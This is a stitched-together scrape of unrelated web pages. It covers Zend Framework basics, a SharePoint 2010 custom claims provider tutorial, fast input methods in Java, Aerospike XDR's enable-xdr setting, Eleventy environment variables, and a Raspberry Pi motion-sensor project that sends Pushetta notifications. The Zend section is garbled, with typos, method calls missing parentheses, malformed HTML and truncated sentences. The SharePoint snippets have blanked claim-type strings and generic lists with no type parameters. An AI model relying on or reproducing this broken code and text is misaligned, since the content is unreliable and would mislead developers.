// Assuming the following: $ctrl->setControllerDirectory( Zend Framework also provides some utility methods. Following are some utility methods provided in the framework.[14]
_forward{$action, $controller = null, $module = null, array $params = null}
Another method is the redirect utility method. This is the opposite of aforementioned -forward method.[14] _redirect performs HTPP in redirection in creation of a new request.[14] _redirect methods accepts two arguments namely $url, and $options.
Furthermore, Action Helpers are also a way to provide extra functionalities within the framework. Action helpers are useful when there is a need to provide functionality between controllers.[14]
//application/controllers/IndexController.php public function init { $this->_helper->viewRenderer->setNoRender; }
During initialization phase of IndexController and ContactController, viewReader is called and noRender flag is called on the view object.[14] The lack of this process creates an error in our application.
Zend Framework provides the view framework to our project and controller and actions are automatically provided to our application. Inside the Zend Framework in view folder we observe the following folders.[14]
In order to create a view we follow:[14]
<!-- application/views/scripts/index/index.phtml --> <html> <head> <title><Hello Zend</title> </head> <body> <hi>Hello Zend</hi> <p>Hello from Zend Framework</p> </body> </html>
// namespace Foo\Controller; use Zend\Mvc\Controller\AbstractActionController; use Zend\View\Model\ViewModel; class BazBatController extends AbstractActionController { public function doSomethingCrazyAction { $view = new ViewModel(array( 'message' => 'Hello world', )); $view->setTemplate('foo/baz-bat/do-something-crazy'); return $view; } }
Zend Technologies, co-founded by PHP core contributors Andi Gutmans and Zeev Suraski, is the corporate sponsor of Zend Framework.[20] Technology partners include IBM,[21]Google,[22]Microsoft,[23]Adobe Systems,[24] and StrikeIron.[25]
Zend Framework features include:[26]
Zend Framework applications can run on any PHP stack that fulfills the technical requirements. Zend Technologies provides a PHP stack, Zend Server (or Zend Server Community Edition), which is advertised to be optimized for running Zend Framework applications. Zend Server includes Zend Framework in its installers, along with PHP and all required extensions. According to Zend Technologies, Zend Server provides improved performance for PHP and especially Zend Framework applications through opcode acceleration and several caching capabilities, and includes application monitoring and diagnostics facilities.[29]Zend Studio is an IDE that includes features specifically to integrate with Zend Framework. It provides an MVC view, MVC code generation based on Zend_Tool (a component of the Zend Framework), a code formatter, code completion, parameter assist, and more.[30] Zend Studio is not free software, whereas the Zend Framework and Zend Server Community Edition are free. Zend Server is compatible with common debugging tools such as Xdebug. Other developers may want to use a different PHP stack and another IDE such as Eclipse PDT which works well together with Zend Server. A pre configured, free version of Eclipse PDT with Zend Debug is available on the Zend web site.
Code contributions to Zend Framework are subject to rigorous code, documentation, and test standards. All code must meet ZF's coding standards and unit tests must reach 80% code coverage before the corresponding code may be moved to the release branch.[31]
On September 22, 2009, Zend Technologies announced[32] that it would be working with technology partners including Microsoft, IBM, Rackspace, Nirvanix, and GoGrid along with the Zend Framework community to develop a common API to cloud application services called the Simple Cloud API. This project is part of Zend Framework and will be hosted on the Zend Framework website,[33] but a separate site called simplecloud.org[34] has been launched to discuss and download the most current versions of the API.The Simple Cloud API and several Cloud Services are included in Zend Framework. The adapters to popular cloud services have reached production quality.
In order to create Hello World program, there are multiple steps including:
Next it needs to be ensured the environment is correct and that there are no errors, followed by setting date and time for tracking functionality.[16] In order to set up date and time many procedures can be followed; for example the method data_default_timezone_set can get called and Zend assumes that default directory will include the phd path.[16] The Zend Framework does not depend on any specific file, but helper classes are helpful in this case. Following are some examples:
Zend Framework 3.0 was released on June 28, 2016. It includes new components like a JSON RPC server, a XML to JSON converter, PSR-7 functionality, and compatibility with PHP 7. Zend Framework 3.0 runs up to 4 times faster than Zend Framework 2, and the packages have been decoupled to allow for greater reuse.[35] The contributors of Zend Framework are actively encouraging the use of Zend Framework version 3.x. The stated end of life for Zend Framework 1 is 2016-09-28, and for Zend Framework 2 is 2018-03-31. The first development release of Zend Framework 2.0 was released on August 6, 2010.[36] Changes made in this release were the removal of require_once statements, migration to PHP 5.3 namespaces, a refactored test suite, a rewritten Zend\Session, and the addition of the new Zend\Stdlib. The second development release was on November 3, 2010.[37] The first stable release of Zend Framework 2.0 was released 5 September 2012.: | http://www.defaultlogic.com/learn?s=Zend_Framework | CC-MAIN-2018-30 | en | refinedweb |
Augmenting Claims and Registering Your Provider.
using Microsoft.SharePoint.Diagnostics;
using Microsoft.SharePoint;
using Microsoft.SharePoint.Administration;
using Microsoft.SharePoint.Administration.Claims;
using Microsoft.SharePoint.WebControls;.
namespace SqlClaimsProvider
{
public class SqlClaims : SPClaimProvider
{
public SqlClaims(string displayName)
: base(displayName)
{
}
}
}.
public override bool SupportsEntityInformation
{
get
{
return true;
}
}
public override bool SupportsHierarchy
{
get
{
return false;
}
}
public override bool SupportsResolve
{
get
{
return false;
}
}
public override bool SupportsSearch
{
get
{
return false;
}
}. " };.
private static string SqlClaimType
{
get
{
return "";
}
}
private static string SqlClaimValueType
{
get
{
return Microsoft.IdentityModel.Claims.ClaimValueTypes.String;
}
}.
Implemented custom Sharepoint Custom Claims Provider
Step1:
Download the code from the link. It is the code written by Ted Pattison, a well renowned sharepoint security expert.
Step 2:
The custom provider class should be Implementing abstract class "SPClaimProvider". Understand the declarations part where we declare name of claim provider, its type,
Value and the name of the custom claim that we gona induce into claims repository
provided by STS.
internal const string ClaimProviderDisplayName = "Audience Claim Provider";
internal const string ClaimProviderDescription = "SharePoint 2010 Demoware from Critical Path Training";
protected const string AudienceClaimType = "";
protected const string StringTypeClaim = Microsoft.IdentityModel.Claims.ClaimValueTypes.String;
public override string Name {
get { return ClaimProviderDisplayName; }
}
Step 3:
Now observe below 4 properties and 2 methods
public override bool SupportsEntityInformation {
get { return true; }
}
public override bool SupportsHierarchy {
get { return true; }
}
public override bool SupportsResolve {
get { return true; }
}
public override bool SupportsSearch {
get { return true; }
}
protected override void FillClaimTypes(List claimTypes) {
if (claimTypes == null) throw new ArgumentException("claimTypes");
claimTypes.Add(AudienceClaimType);
}
protected override void FillClaimValueTypes(List claimValueTypes) {
if (claimValueTypes == null) throw new ArgumentException("claimValueTypes");
claimValueTypes.Add(StringTypeClaim);
}
Though they look simple, these properties control the execution of the remaining
code. For example, SupportSearch property returns true. This means, when a search
happens in my sitecollection, the code in my claim provider will be executed
instead of default search code in sharepoint.
Step 4: We have 4 more abstract methods to override.
FillClaimsForEntity() - Method controls additional claims loaded/created for logged
in user
FillHierarchy() - Method controls the Claim provider hierarchy display in search
window.
FillSearch() - Method controls the search functionality in all people pickers in
site collection.
FillResolve() - Method controls functionality executed when you type in a name and
click resolve button (one with green tick mark).
Here is where my code sample is simplified for better understanding. Instead of involving
audience manager into scope, i simple created a array of strings representing
users on my machine.
internal string[] AvailableClaims = {"administrator","spuser","pratap" };
I will add extra claim with claim-type as ""
and Claim-value as their name from this array.
Step 5: Look at the updated methods with simplest possible code.
protected override void FillClaimsForEntity(System.Uri context, SPClaim entity, List claims) {
if (entity == null) throw new ArgumentException("entity");
if (claims == null) throw new ArgumentException("claims");
string userLogin = (entity.Value.Split('\\'))[1];
foreach(string claim in AvailableClaims)
{
if (userLogin.ToLower()==claim.ToLower()) {
claims.Add(CreateClaim(AudienceClaimType, claim, StringTypeClaim));
}
}
}
protected override void FillHierarchy(System.Uri context, string[] entityTypes, string hierarchyNodeID,
int numberOfLevels, SPProviderHierarchyTree hierarchy) {
// No additional nodes need to be added to the People Picker
}
protected override void FillSearch(System.Uri context, string[] entityTypes, string searchPattern, string
hierarchyNodeID, int maxCount, SPProviderHierarchyTree searchTree) {
if (EntityTypesContain(entityTypes, SPClaimEntityTypes.FormsRole)) {
List audiences = new List();
foreach (string claim in AvailableClaims) {
if (claim.StartsWith(searchPattern, StringComparison.CurrentCultureIgnoreCase))
audiences.Add(claim);
}
foreach (string audienceName in audiences)
searchTree.AddEntity(CreatePickerEntityForAudience(audienceName));
}
}
protected override void FillResolve(System.Uri context, string[] entityTypes, string resolveInput, List resolved)
{
List audiences = new List();
foreach (string claim in AvailableClaims)
{
if (claim.StartsWith(resolveInput, StringComparison.CurrentCultureIgnoreCase))
audiences.Add(claim);
}
foreach (string audienceName in audiences)
{
resolved.Add(CreatePickerEntityForAudience(audienceName));
}
}
Output:
Now when i log into application, below are the claims created because of my code
Look at the people picker search window changed from what to what.
If you observe we haven't implemented any thing in FillHierarchy() Method as
we didn't have any child nodes to display in our claim provider. But you
can implement this method if you want to display some thing like below.
Look how the resolving of names got changed.
If you observe the first one is resolved based on my windows credentials. But the
second one is resolved based on my claim value.
Last obvious question, what we achieved from this?
Well let me show you. i have a document which has to be displayed for people whose
age>18.
we need to do 2 simple things.
1- Break default inheritance of permissions on that document.
2- Assign the permissions to "Youth" and "MiddleAge" claims.
Now anyone who login with age less than 18 will not be able to see it. Now you don't
need to bother about no of people and their ids or their AD Associations. Just
follow our custom claim value.
Demo: I have a document library with 3 documents. I want to show only 2 documents
to user Pratap.
Go to those two documents and manage their permissions.
Remove all users from access list and remove permission inheritance.
Add access to specific claim type, in this case to "pratap".
Now, when pratap login, this is how the document library will be displayed.
Task accomplished. We have learned about Custom Claims Provider, significance of
each method in it and Importantly how granular level security can be implemented
using custom claims. | http://www.nullskull.com/a/10476690/sharepoint-2010-claims-augmentation.aspx | CC-MAIN-2018-30 | en | refinedweb |
What does enable-xdr in global and namespace context control?
Detail
This article explains what the
enable-xdr configuration at global and at namespace level controls and when does XDR connect to a remote DC and ship records.
enable-xdr is a dynamically configurable parameter, which exists at 2 different contexts: global as well as namespace. This controls only the logging of digest entries in the digest log. It does not control the shipping of records.
Logging into the digest log and shipping are 2 different things.
Digest logging
Refer to the 2
enable-xdr entries in the Log Reference Manual and notice the 2 different contexts, xdr as well as namespace.
For digests to be logged in the digest log (
xdr-digest-log-path, the global xdr context should always have
enable-xdr set to true.
Digests will not be logged in the digest log if
enable-xdr is set to false on the global level, irrespective of the value at the namespace level.
In the namespace context, for every namespace one can control whether the digest log entires should be logged for that namespace on that node by setting
enable-xdr to true or false at the namespace level.
The following table details the different possibilities:
For a given namespace, digest log entries will be logged only when enable-xdr is true in both the global as well as namespace contexts.
Connecting to a destination DC.
As of Aerospike Enterprise Edition 3.14, XDR will only connect to a destination DC if it is seeded at the global xdr context and if at least one namespace is associated with it.
Shipping
If there are records in the digest log that have not been processed (determined by the
xdr-ship-outstanding-objects metric), XDR will keep shipping the related records irrespective of whether
enable-xdr is set to true or false. This is because
enable-xdr only determines whether the digest entries are logged into the
digest log or not.
enable-xdr does not control the shipping.
Note: By default, xdr always keep shipping if there are pending records in the digest log. This can be controlled using
xdr-shipping-enabled config.
It is usually not recommended to change this configuration outside of very specific situations.
Keywords
XDR digestlog digest enable-xdr shipping
Timestamp
01/06/2018 | https://discuss.aerospike.com/t/impact-of-enable-xdr-global-v-s-namespace-context/5248 | CC-MAIN-2018-30 | en | refinedweb |
Eleventy is increasing in popularity because it allows us to create nice, simple websites, but also — because it’s so developer-friendly. We can build large-scale, complex projects with it, too. In this tutorial we’re going to demonstrate that expansive capability by putting a together a powerful and human-friendly environment variable solution.
What are environment variables?What are environment variables?
Environment variables are handy variables/configuration values that are defined within the environment that your code finds itself in.
For example, say you have a WordPress site: you’re probably going to want to connect to one database on your live site and a different one for your staging and local sites. We can hard-code these values in
wp-config.php but a good way of keeping the connection details a secret and making it easier to keep your code in source control, such as Git, is defining these away from your code.
Here’s a standard-edition WordPress
wp-config.php snippet with hardcoded values:
<?php define( 'DB_NAME', 'my_cool_db' ); define( 'DB_USER', 'root' ); define( 'DB_PASSWORD', 'root' ); define( 'DB_HOST', 'localhost' );
Using the same example of a
wp-config.php file, we can introduce a tool like phpdotenv and change it to something like this instead, and define the values away from the code:
<?php $dotenv = Dotenv\Dotenv::createImmutable(__DIR__); $dotenv->load(); define( 'DB_NAME', $_ENV['DB_NAME'] ); define( 'DB_USER', $_ENV['DB_USER'] ); define( 'DB_PASSWORD', $_ENV['DB_PASSWORD'] ); define( 'DB_HOST', $_ENV['DB_HOST'] );
A way to define these environment variable values is by using a
.env file, which is a text file that is commonly ignored by source control.
We then scoop up those values — which might be unavailable to your code by default, using a tool such as dotenv or phpdotenv. Tools like dotenv are super useful because you could define these variables in an
.env file, a Docker script or deploy script and it’ll just work — which is my favorite type of tool!
The reason we tend to ignore these in source control (via
.gitignore) is because they often contain secret keys or database connection information. Ideally, you want to keep that away from any remote repository, such as GitHub, to keep details as safe as possible.
Getting startedGetting started
For this tutorial, I’ve made some starter files to save us all a bit of time. It’s a base, bare-bones Eleventy site with all of the boring bits done for us.
Step one of this tutorial is to download the starter files and unzip them wherever you want to work with them. Once the files are unzipped, open up the folder in your terminal and run
npm install. Once you’ve done that, run
npm start. When you open your browser at, it should look like this:
Also, while we’re setting up: create a new, empty file called
.env and add it to the root of your base files folder.
Creating a friendly interfaceCreating a friendly interface
Environment variables are often really shouty, because we use all caps, which can get irritating. What I prefer to do is create a JavaScript interface that consumes these values and exports them as something human-friendly and namespaced, so you know just by looking at the code that you’re using environment variables.
Let’s take a value like
HELLO=hi there, which might be defined in our
.env file. To access this, we use
process.env.HELLO, which after a few calls, gets a bit tiresome. What if that value is not defined, either? It’s handy to provide a fallback for these scenarios. Using a JavaScript setup, we can do this sort of thing:
require('dotenv').config(); module.exports = { hello: process.env.HELLO || 'Hello not set, but hi, anyway 👋' };
What we are doing here is looking for that environment variable and setting a default value, if needed, using the OR operator (
||) to return a value if it’s not defined. Then, in our templates, we can do
{{ env.hello }}.
Now that we know how this technique works, let’s make it happen. In our starter files folder, there is a directory called
src/_data with an empty
env.js file in it. Open it up and add the following code to it:
require('dotenv').config(); module.exports = { otherSiteUrl: process.env.OTHER_SITE_URL || '', hello: process.env.HELLO || 'Hello not set, but hi, anyway 👋' };
Because our data file is called
env.js, we can access it in our templates with the
env prefix. If we wanted our environment variables to be prefixed with
environment, we would change the name of our data file to
environment.js . You can read more on the Eleventy documentation.
We’ve got our
hello value here and also an
otherSiteUrl value which we use to allow people to see the different versions of our site, based on their environment variable configs. This setup uses Eleventy JavaScript Data Files which allow us to run JavaScript and return the output as static data. They even support asynchronous code! These JavaScript Data Files are probably my favorite Eleventy feature.
Now that we have this JavaScript interface set up, let’s head over to our content and implement some variables. Open up
src/index.md and at the bottom of the file, add the following:
Here’s an example: The environment variable, HELLO is currently: “{{ env.hello }}”. This is called with {% raw %}{{ env.hello }}{% endraw %}.
Pretty cool, right? We can use these variables right in our content with Eleventy! Now, when you define or change the value of
HELLO in your
.env file and restart the
npm start task, you’ll see the content update.
Your site should look like this now:
You might be wondering what the heck
{% raw %} is. It’s a Nunjucks tag that allows you to define areas that it should ignore. Without it, Nunjucks would try to evaluate the example
{{ env.hello }} part.
Modifying image base pathsModifying image base paths
That first example we did was cool, but let’s really start exploring how this approach can be useful. Often, you will want your production images to be fronted-up with some sort of CDN, but you’ll probably also want your images running locally when you are developing your site. What this means is that to help with performance and varied image format support, we often use a CDN to serve up our images for us and these CDNs will often serve images directly from your site, such as from your
/images folder. This is exactly what I do on Piccalilli with ImgIX, but these CDNs don’t have access to the local version of the site. So, being able to switch between CDN and local images is handy.
The solution to this problem is almost trivial with environment variables — especially with Eleventy and dotenv, because if the environment variables are not defined at the point of usage, no errors are thrown.
Open up
src/_data/env.js and add the following properties to the object:
imageBase: process.env.IMAGE_BASE || '/images/', imageProps: process.env.IMAGE_PROPS,
We’re using a default value for
imageBase of
/images/ so that if
IMAGE_BASE is not defined, our local images can be found. We don’t do the same for
imageProps because they can be empty unless we need them.
Open up
_includes/base.njk and, after the
<h1>{{ title }}</h1> bit, add the following:
<img src="{{ env.imageBase }}mountains.jpg{{ env.imageProps }}" alt="Some lush mountains at sunset" />
By default, this will load
/images/mountains.jpg. Cool! Now, open up the
.env file and add the following to it:
IMAGE_BASE= IMAGE_PROPS=?width=1275&height=805&format=auto&quality=70
If you stop Eleventy (
Ctrl+
C in terminal) and then run
npm start again, then view source in your browser, the rendered image should look like this:
<img src="" alt="Some lush mountains at sunset" />
This means we can leverage the CodePen asset optimizations only when we need them.
Powering private and premium content with EleventyPowering private and premium content with Eleventy
We can also use environment variables to conditionally render content, based on a mode, such as private mode. This is an important capability for me, personally, because I have an Eleventy Course, and CSS book, both powered by Eleventy that only show premium content to those who have paid for it. There’s all-sorts of tech magic happening behind the scenes with Service Workers and APIs, but core to it all is that content can be conditionally rendered based on
env.mode in our JavaScript interface.
Let’s add that to our example now. Open up
src/_data/env.js and add the following to the object:
mode: process.env.MODE || 'public'
This setup means that by default, the
mode is public. Now, open up
src/index.md and add the following to the bottom of the file:
{% if env.mode === 'private' %} ## This is secret content that only shows if we’re in private mode. This is called with {% raw %}`{{ env.mode }}`{% endraw %}. This is great for doing special private builds of the site for people that pay for content, for example. {% endif %}
If you refresh your local version, you won’t be able to see that content that we just added. This is working perfectly for us — especially because we want to protect it. So now, let’s show it, using environment variables. Open up
.env and add the following to it:
MODE=private
Now, restart Eleventy and reload the site. You should now see something like this:
You can run this conditional rendering within the template too. For example, you could make all of the page content private and render a paywall instead. An example of that is if you go to my course without a license, you will be presented with a call to action to buy it:
Fun modeFun mode
This has hopefully been really useful content for you so far, so let’s expand on what we’ve learned and have some fun with it!
I want to finish by making a “fun mode” which completely alters the design to something more… fun. Open up
src/_includes/base.njk, and just before the closing
</head> tag, add the following:
{% if env.funMode %} <link rel="stylesheet" href="" /> <style> body { font-family: 'Comic Sans MS', cursive; background: #fc427b; color: #391129; } h1, .fun { font-family: 'Lobster'; } .fun { font-size: 2rem; max-width: 40rem; margin: 0 auto 3rem auto; background: #feb7cd; border: 2px dotted #fea47f; padding: 2rem; text-align: center; } </style> {% endif %}
This snippet is looking to see if our
funMode environment variable is
true and if it is, it’s adding some “fun” CSS.
Still in
base.njk, just before the opening
<article> tag, add the following code:
{% if env.funMode %} <div class="fun"> <p>🎉 <strong>Fun mode enabled!</strong> 🎉</p> </div> {% endif %}
This code is using the same logic and rendering a fun banner if
funMode is
true. Let’s create our environment variable interface for that now. Open up
src/_data/env.js and add the following to the exported object:
funMode: process.env.FUN_MODE
If
funMode is not defined, it will act as
false, because
undefined is a falsy value.
Next, open up your
.env file and add the following to it:
FUN_MODE=true
Now, restart the Eleventy task and reload your browser. It should look like this:
Pretty loud, huh?! Even though this design looks pretty awful (read: rad), I hope it demonstrates how much you can change with this environment setup.
Wrapping upWrapping up
We’ve created three versions of the same site, running the same code to see all the differences:
All of these sites are powered by identical code with the only difference between each site being some environment variables which, for this example, I have defined in my Netlify dashboard.
I hope that this technique will open up all sorts of possibilities for you, using the best static site generator, Eleventy!
I feel like the code block right before “By default, this will load /images/mountains.jpg.” is false. Isn’t it supposed to be
<img src="{{ env.imageBase }}mountains.jpg{{ env.imageProps }}" alt="Some lush mountains at sunset" />?
@YellowLed – yup. Thanks for the correx! I was about to try making a similar change myself, but then saw your comment.
Thanks for this. I’ve updated it :) | https://css-tricks.com/give-your-eleventy-site-superpowers-with-environment-variables/ | CC-MAIN-2021-04 | en | refinedweb |
Reducing Time limit of code in Java
Hey Folks! Being in the world of competitive programming, every one of us often face TLE (Time Limit Exceeded) Errors. Reducing TL of one's code is one of the most crucial phase of learning for programmers.
One of the most popular platform for competetive programming is codechef.
By-default : Codechef has the TL (Time Limit) for any problem as 1 sec. Java Language has a multiplier of 2 and phython has multiplier of 5.
Java being a heavy language, does uses extra space and time for loading the framework into code-cache along with the main program. But its not the memory issue, one generally faces but TLE.
So, one of the most common way of reducing TL of one's code is to use fast input and otput methods. This really helps. Java is also called a slow language because of its slow input and output. So, many a times, just by adding fast input output to their program and without making any changes in their logic, coders are able to get AC (ALL CORRECT).
Most problem setters explicitly reduce TL and multipliers of their problem so as to force users to learn and use fast input output methods.
Moreover, we often encounter problem statements saying: "Warning: Large I/O data, be careful with certain languages (though most should be OK if the algorithm is well designed)”. This is a direct hint given to users to use Faster I/O techniques.
The ways of I/O are:
- Scanner class
- BufferedReader class
- User-defined FastReader Class
- Reader Class
Java coders generally use Scanner Class in the following way:
import java.io.BufferedReader; import java.io.InputStreamReader; import java.util.Scanner; public class Main { public static void main(String[] args) { Scanner s = new Scanner(System.in); int n = s.nextInt(); int k = s.nextInt(); int count = 0; while (n-- > 0) { int x = s.nextInt(); if (x%k == 0) count++; } System.out.println(count); } }
But even if its easy and requires less typing but it is not recommended as its very slow. In most of the cases we get TLE while using scanner class. So, instead of using Scanner class, why not try something new.
So, here are some of the classes which are used for fast input and output.
BufferedReader class
Although, this class is fast but its not recommended as it requires lot of typing. It reads the code from the character-input stream entered by user and buffering characters and hence provides an efficient way reading of characters, arrays, and lines. However, reading multiple words from single line increases its time complexity because of the use of Stringtokenizer and hence this is not recommended. However, it reduces the running time to approx 0.89 s.
import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.util.StringTokenizer; public class Main { public static void main(String[] args) throws IOException { BufferedReader br = new BufferedReader(new InputStreamReader(System.in)); StringTokenizer st = new StringTokenizer(br.readLine()); int n = Integer.parseInt(st.nextToken()); int k = Integer.parseInt(st.nextToken()); int count = 0; while (n-- > 0){ int x = Integer.parseInt(br.readLine()); if (x%k == 0) count++; } System.out.println(count); } }
Here,
BufferedReader is a class commonly used in Java language.
Work : It reads the text from a given Input stream (like code stored in a file) by buffering characters and hence reads characters, arrays or lines.
StringTokenizer is also a class.
Work : It allows an application to break a string in our code into tokens. This class is retained for compatibility reasons. Howener, its use is discouraged in new code and new users are not advised to use this class. This is mainly because this class's methods do not distinguish among identifiers, numbers, and quoted strings.
The Integer.parseInt() java method is a method.
Work : It is mainly used in parsing a String method argument into an Integer object. The Integer object is a wrapper class for the int primitive data type of java API.
User-defined FastReader Class
This method uses both BufferedReader and StringTokenizer and takes the advantage of user defined methods. As a result, its time efficient and also requires less typing. This gets accepted with a time of 1.23 s. So, due to less typing, it is easy to remember and is fast enough to meet the needs of most of the question in competitive coding.
import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.util.Scanner; import java.util.StringTokenizer; public class Main{ static class FastReader { BufferedReader br; StringTokenizer st; public FastReader() { br = new BufferedReader(new InputStreamReader(System.in)); } String next(){ while (st == null || !st.hasMoreElements()){ try { st = new StringTokenizer(br.readLine()); } catch (IOException e){ e.printStackTrace(); } } return st.nextToken(); } int nextInt(){ return Integer.parseInt(next()); } long nextLong(){ return Long.parseLong(next()); } double nextDouble(){ return Double.parseDouble(next()); } String nextLine(){ String str = ""; try{ str = br.readLine(); } catch (IOException e){ e.printStackTrace(); } return str; } } public static void main(String[] args){ FastReader s=new FastReader(); int n = s.nextInt(); int k = s.nextInt(); int count = 0; while (n-- > 0) { int x = s.nextInt(); if (x%k == 0) count++; } System.out.println(count); } }
Here,
FastReader is a userdefined Class which uses bufferedReader and StringTokenizer class. Both these classes are defined above and are very fast, hence reducing Time Limit of our code.
Reader Class
There is the fastest way but is not recommended since it is difficult to remember and is cumbersome in its approach. It effectively reduces the Time Limit of the code to just 0.28 s.
The reader class uses inputDataStream. It reads through the stream of data provided and also uses read() method and nextInt() methods for taking inputs.
Java.io.DataInputStream class lets an application read primitive Java data types from an underlying input stream in a machine-independent way.
The read() method is used to read a single character from our code. This method reads the stream of our code till:
- Some IOException has occurred
- It has reached the end of the stream while reading.
This method is declared as abstract method i.e. the subclasses of Reader abstract class should override this method if desired operation needs to be changed while reading a character.
NOTE :
- This method does not accepts any parameters
- It returns an integer value which is the integer value read from our code.
- Returned value can range from 0 to 65535.
- It returns -1 if no character has been read.
import java.io.DataInputStream; import java.io.FileInputStream; import java.io.IOException; import java.io.InputStreamReader; import java.util.Scanner; import java.util.StringTokenizer; public class Main{ static class Reader { final private int BUFFER_SIZE = 1 << 16; private DataInputStream din; private byte[] buffer; private int bufferPointer, bytesRead; public Reader() { din = new DataInputStream(System.in); buffer = new byte[BUFFER_SIZE]; bufferPointer = bytesRead = 0; } public Reader(String file_name) throws IOException{ din = new DataInputStream(new FileInputStream(file_name)); buffer = new byte[BUFFER_SIZE]; bufferPointer = bytesRead = 0; } public String readLine() throws IOException{ byte[] buf = new byte[64]; // line length int cnt = 0, c; while ((c = read()) != -1) { if (c == '\n') break; buf[cnt++] = (byte) c; } return new String(buf, 0, cnt); } public int nextInt() throws IOException { int ret = 0; byte c = read(); while (c <= ' ') c = read(); boolean neg = (c == '-'); if (neg) c = read(); do{ ret = ret * 10 + c - '0'; } while ((c = read()) >= '0' && c <= '9'); if (neg) return -ret; return ret; } public long nextLong() throws IOException { long ret = 0; byte c = read(); while (c <= ' ') c = read(); boolean neg = (c == '-'); if (neg) c = read(); do { ret = ret * 10 + c - '0'; } while ((c = read()) >= '0' && c <= '9'); if (neg) return -ret; return ret; } public double nextDouble() throws IOException { double ret = 0, div = 1; byte c = read(); while (c <= ' ') c = read(); boolean neg = (c == '-'); if (neg) c = read(); do { ret = ret * 10 + c - '0'; } while ((c = read()) >= '0' && c <= '9'); if (c == '.') { while ((c = read()) >= '0' && c <= '9') { ret += (c - '0') / (div *= 10); } } if (neg) return -ret; return ret; } private void fillBuffer() throws IOException{ bytesRead = din.read(buffer, bufferPointer = 0, BUFFER_SIZE); if (bytesRead == -1) buffer[0] = -1; } private byte read() throws IOException { if (bufferPointer == bytesRead) fillBuffer(); return buffer[bufferPointer++]; } public void close() throws IOException { if (din == null) return; din.close(); } } public static void main(String[] args) throws IOException{ Reader s=new Reader(); int n = s.nextInt(); int k = s.nextInt(); int count=0; while (n-- > 0) { int x = s.nextInt(); if (x%k == 0) count++; } System.out.println(count); } }
Some of the common methods used are:
- close() : It is an abstract void method and closes the stream of data and releases any system resources associated with it.
- mark(int readAheadLimit) : It marks the present position in the stream.
- markSupported() : It returns the boolean value and checks whether stream supports the mark() operation.
- read() : It returns an integer value and reads a single character.
- read(char[] cbuf) : It returns an integer value and reads characters into an array.
Having implemented all these, even if our code continues to give TLE, we have to resort to our basic approach i.e by changing the logic of code and reduce it's Time Complexity to O(1), O(n) or O(log n).
The maximum time complexity that a code can have is decided by the costaints and the Time Limit mentioned in the problem statement. Generally, the Time Limit is 1 sec and the its the constraints that vary. If the constraint is 10^8, then maximum time complexity of code which can pass without getting TLE is O(N).
NOTE:
Time complexity of a function (or set of statements) is considered as:
- O(1) : if our code doesn’t contain any loop, recursion or call to any other non O(1) time function.
- O(n) : if our code contains only a single for - loop or while - loop.
- O(n^c) where c is the number of nested loops present in our code.
- O(log n) : if the loop variables are divided or multiplied by some constant amount.
With this article at OpenGenus, you must have a good idea of how to make your Java code execute faster. Enjoy. | https://iq.opengenus.org/reduce-time-limit-of-java-code/ | CC-MAIN-2021-04 | en | refinedweb |
-
Pushetta: Send push notifications from Your Raspberry Pi
Web site:
Project Summary:
Use a Raspberry Pi to send push notification to Android and iOS smartphones. We present a simple intrusion detection system which send a push notification when someone enters in a room.
Full Project:
Some time ago sending a realtime notifications from and embedded system was a problem with few solutions, the one most widespread was SMS. This is an effective solution because knowing the phone number of recipient is all You need to send it a few words. On the other side there are some issues with SMS:
- You must pay to send messages
- You need to know in advance all the recipients’ numbers
- You can send a limited number of characters
- You can’t get information about read messages
Today there are more options to solve the task and the one I like more is push notifications. Major mobile operating system implements some system to handle push notifications, Apple was the first to introduce them and in a short time all others OS did.
Pushetta, push notifications from the cloud
What I like to present here is Pushetta, a system made to make trivial use of push notifications, and to dimostrate it I made a simple example using a Raspberry Pi.
First of all You need to register on Pushetta web site, it’s free and it’s a mandatory step to be able to send notifications ().
After registered it’s time to login and create your first channel, a channel is something like a topic where your notifications are sent . User want to receive notifications have to subscribe channel interested in.
Creating a channel requires few data: an image to identify it, a name and a short description are the essential ones. Channel can be public or private, at this time only public channels are available, hidden flag make it invisible from search.
After a channel is created we are ready to start pushing notifications, now it’s time to use or Raspberry Pi. Pushing notifications with Pushetta can be made in many ways, using curl from command line or from all major languages, we’ll use python in our project.
Send a notification when someone is in the room
We’ll use Raspberry Pi as intrusion detection system, our objective is to push a notification when someone get in a room. First we need to prepare the SD, I use raspbian in this project (it can downloaded from here and here there are instructions to install it).
Installed raspbian it’s time to make a simple circuit to detect when someone enters the room. I use a PIR (Passive InfraRed) sensor, this kind of sensor uses infrared light to detect temperature changes in a specific range (check here form a detailed explanation). Given that human body is warmer than the surrounding environment it can detect when someone move around.
This sensors are really simple to interface with, all we need it to give it power and check OUT pin from a Rapberry Pi GPIO. When OUT pin goes high (+3.3V) something is in range.
I made this simple circuit using Raspberry model B but it can be simply adapted for other models. Now we can start writing our first lines of code to read PIR status. I’ll use a Python module very useful that make it trivial to use GPIO on Raspberry Pi, this module is called RPi.GPIO. First of all we need to connect to Raspberry Pi via ssh and download the module.
$ wget $ tar xvzf RPi.GPIO-0.5.8.tar.gz $ cd RPi.GPIO-0.5.8/ $ sudo python setup.py install
If You get an error like “Python.h: No such file or directory” You need to install Python dev packages with:
$ sudo apt-get install python-dev
Now we are ready to write the Python code, is very important to use a pinout reference when write the code, one really good is here.
import RPi.GPIO as GPIO import time GPIO.setmode(GPIO.BCM) # In BCM mode pin 7 is identified by id 4 PIR_PIN = 4 GPIO.setup(PIR_PIN, GPIO.IN) try: print "Reading PIR status" while True: if GPIO.input(PIR_PIN): print "Motion detected!" except KeyboardInterrupt: print "Exit" GPIO.cleanup()
By default GPIO are accessible only to admin users so to use the script launch it with sudo (something like “sudo python test_pir.py”).
Now, if all works as expected we’ll see in console “Motion detected!” every time PIR detects some movements and next step is to push a notification in this condition. Looking a Pushetta’s doc page there is a Python sample with everything we need. I used a polling approach, that is checking continuously the status of OUT pin in a infinite loop. This isn’t the best approach, a better one is using interrupt but is more complex and I prefer to get focused on our target.
First we need to imports some modules in our script.
import urllib2 import json
And define the function to send the notification.
def sendNotification(token, channel, message): data = { "body" : message, "message_type" : "text/plain" } req = urllib2.Request('{0}/'.format(channel)) req.add_header('Content-Type', 'application/json') req.add_header('Authorization', 'Token {0}'.format(token)) response = urllib2.urlopen(req, json.dumps(data))
Now it’s only matter to combine everything and you’re done, the full working example can be downloaded from here.
Software & Code Snippets:
